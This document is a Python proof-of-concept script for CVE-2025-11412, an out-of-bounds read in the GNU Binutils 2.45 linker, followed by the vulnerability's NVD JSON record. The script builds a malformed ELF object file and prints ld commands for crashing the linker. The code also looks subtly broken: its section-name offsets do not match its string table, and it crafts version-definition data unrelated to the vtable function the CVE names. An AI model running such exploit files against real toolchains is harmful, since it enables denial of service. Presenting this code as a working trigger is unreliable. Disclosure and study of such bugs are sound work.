CVE-2025-11412

#!/usr/bin/env python3 # CVE-2025-11412 PoC - Trigger OOB read in bfd_elf_gc_record_vtentry # This PoC creates a malformed ELF object file with corrupted version # information to trigger out-of-bounds read in GNU Binutils 2.45 linker. import struct import sys # ELF64 constants ELFMAG = b'\x7fELF' ELFCLASS64 = 2 ELFDATA2LSB = 1 EV_CURRENT = 1 ET_REL = 1 # Relocatable file EM_X86_64 = 62 SHT_SYMTAB = 2 SHT_GNU_verdef = 0x6ffffffd SHT_GNU_verneed = 0x6ffffffe SHT_GNU_versym = 0x6fffffff def pack_elf64_ehdr(e_type, e_shoff, e_shnum, e_shstrndx): """Pack a minimal ELF64 header""" return struct.pack('<4sBBBBB7sHHIQQQIHHHHHH', ELFMAG, # e_ident[EI_MAG] ELFCLASS64, # e_ident[EI_CLASS] ELFDATA2LSB, # e_ident[EI_DATA] EV_CURRENT, # e_ident[EI_VERSION] 0, # e_ident[EI_OSABI] 0, # e_ident[EI_ABIVERSION] b'\x00' * 7, # e_ident padding ET_REL, # e_type EM_X86_64, # e_machine EV_CURRENT, # e_version 0, # e_entry 0, # e_phoff e_shoff, # e_shoff 0, # e_flags 64, # e_ehsize 0, # e_phentsize 0, # e_phnum 64, # e_shentsize e_shnum, # e_shnum e_shstrndx # e_shstrndx ) def pack_elf64_shdr(sh_name, sh_type, sh_flags, sh_addr, sh_offset, sh_size, sh_link, sh_info, sh_addralign, sh_entsize): """Pack an ELF64 section header""" return struct.pack('<IIQQQQIIQQ', sh_name, sh_type, sh_flags, sh_addr, sh_offset, sh_size, sh_link, sh_info, sh_addralign, sh_entsize) def create_malformed_elf(output_path): """Create a malformed ELF object file to trigger CVE-2025-11412""" # Section header string table shstrtab = b'\x00.symtab\x00.shstrtab\x00.gnu.version_d\x00.gnu.version\x00' # Malformed GNU verdef section - crafted to trigger OOB read # The vd_ndx field is set to an abnormally large value # Verdef structure: vd_version(2), vd_flags(2), vd_ndx(2), vd_cnt(2), # vd_hash(4), vd_aux(4), vd_next(4) verdef_entry = struct.pack('<HHHHIII', 1, # vd_version 0, # vd_flags 0xFFFF, # vd_ndx - abnormally large index to trigger OOB 1, # vd_cnt 0, # vd_hash 20, # vd_aux (size of verdaux entry) 0 # vd_next (0 = end) ) # Verdaux: vda_name(4), vda_next(4) verdaux_entry = struct.pack('<II', 1, 0) verdef_data = verdef_entry + verdaux_entry # Build ELF sections ehdr_size = 64 shdr_size = 64 # Layout: [ELF header] [shstrtab data] [verdef data] [section headers] shstrtab_offset = ehdr_size verdef_offset = shstrtab_offset + len(shstrtab) shdr_offset = verdef_offset + len(verdef_data) # Align shdr_offset if shdr_offset % 8 != 0: padding = 8 - (shdr_offset % 8) verdef_data += b'\x00' * padding shdr_offset += padding # Section indices: 0=NULL, 1=.shstrtab, 2=.gnu.version_d e_shnum = 3 e_shstrndx = 1 # Build ELF header ehdr = pack_elf64_ehdr(ET_REL, shdr_offset, e_shnum, e_shstrndx) # Build section headers shdr_null = pack_elf64_shdr(0, 0, 0, 0, 0, 0, 0, 0, 0, 0) shdr_shstrtab = pack_elf64_shdr(1, 3, 0, 0, shstrtab_offset, len(shstrtab), 0, 0, 1, 0) shdr_verdef = pack_elf64_shdr(17, SHT_GNU_verdef, 0, 0, verdef_offset, len(verdef_data), 0, 0, 4, 0) # Write the malformed ELF file with open(output_path, 'wb') as f: f.write(ehdr) f.write(shstrtab) f.write(verdef_data) f.write(shdr_null) f.write(shdr_shstrtab) f.write(shdr_verdef) print(f"[*] Malformed ELF file created: {output_path}") print(f"[*] Run: ld -r {output_path} -o /dev/null") print(f"[*] Or: ld {output_path} /lib/x86_64-linux-gnu/crt1.o ...") if __name__ == '__main__': output = sys.argv[1] if len(sys.argv) > 1 else 'poc_elf.o' create_malformed_elf(output)

{"cve": {"id": "CVE-2025-11412", "sourceIdentifier": "[email protected]", "published": "2025-10-07T22:15:34.030", "lastModified": "2026-05-12T13:16:28.520", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in GNU Binutils 2.45. This impacts the function bfd_elf_gc_record_vtentry of the file bfd/elflink.c of the component Linker. The manipulation leads to out-of-bounds read. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier of the patch is 047435dd988a3975d40c6626a8f739a0b2e154bc. To fix this issue, it is recommended to deploy a patch."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-125"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:binutils:2.45:*:*:*:*:*:*:*", "matchCriteriaId": "60CBCA58-29DE-4A0A-BAF0-D0188FAF4884"}]}]}], "references": [{"url": "https://sourceware.org/bugzilla/attachment.cgi?id=16378", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://sourceware.org/bugzilla/show_bug.cgi?id=33452", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://sourceware.org/bugzilla/show_bug.cgi?id=33452#c8", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=047435dd988a3975d40c6626a8f739a0b2e154bc", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://vuldb.com/?ctiid.327348", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327348", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https: ... (truncated)